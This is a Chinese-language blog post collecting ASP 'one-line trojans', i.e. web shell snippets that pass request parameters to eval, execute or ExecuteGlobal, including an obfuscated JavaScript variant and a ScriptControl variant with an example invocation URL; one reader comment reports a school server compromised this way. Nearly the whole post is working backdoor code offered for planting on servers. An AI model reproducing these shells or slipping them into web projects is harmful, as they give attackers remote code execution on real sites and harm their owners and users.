各种web语言脚本的一句话木马大总结

asp一句话木马
程序代码

  1. <%eval request(“sb”)%>

程序代码

  1. <%execute request(“sb”)%>

程序代码

  1. <%execute(request(“sb”))%>

程序代码

  1. <%execute request(“sb”)%><%’<% loop <%:%>

程序代码

  1. <%’<% loop <%:%><%execute request(“sb”)%>

程序代码

  1. <%execute request(“sb”)’<% loop <%:%>[code]
  2. [code]<script language=vbs runat=server>eval(request("sb"))</script>

程序代码

  1. %><%Eval(Request(chr(35)))%><%

程序代码

  1. <%ExecuteGlobal request("sb")%>

程序代码

  1. if Request("sb")<>"" then ExecuteGlobal request("sb") end if
  2. //容错代码

程序代码

  1. <%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
  2. <%
  3. var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
  4. lcx.性别((lcx.名字)+'');
  5. %>
  6. //使用冰狐一句话客户端链接

程序代码

  1. <%
  2. Set o = Server.CreateObject("ScriptControl")
  3. o.language = "vbscript"
  4. o.addcode(Request("SubCode")) '参数SubCode作为过程代码
  5. o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
  6. %>

调用示例:

程序代码
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29




coded by nessus
发表评论?

1 条评论。

  1. 我有个服务器是学校学生处网站的
    就被人上传了
    这样的木马 网站安全性没有搞好 真郁闷呀

发表评论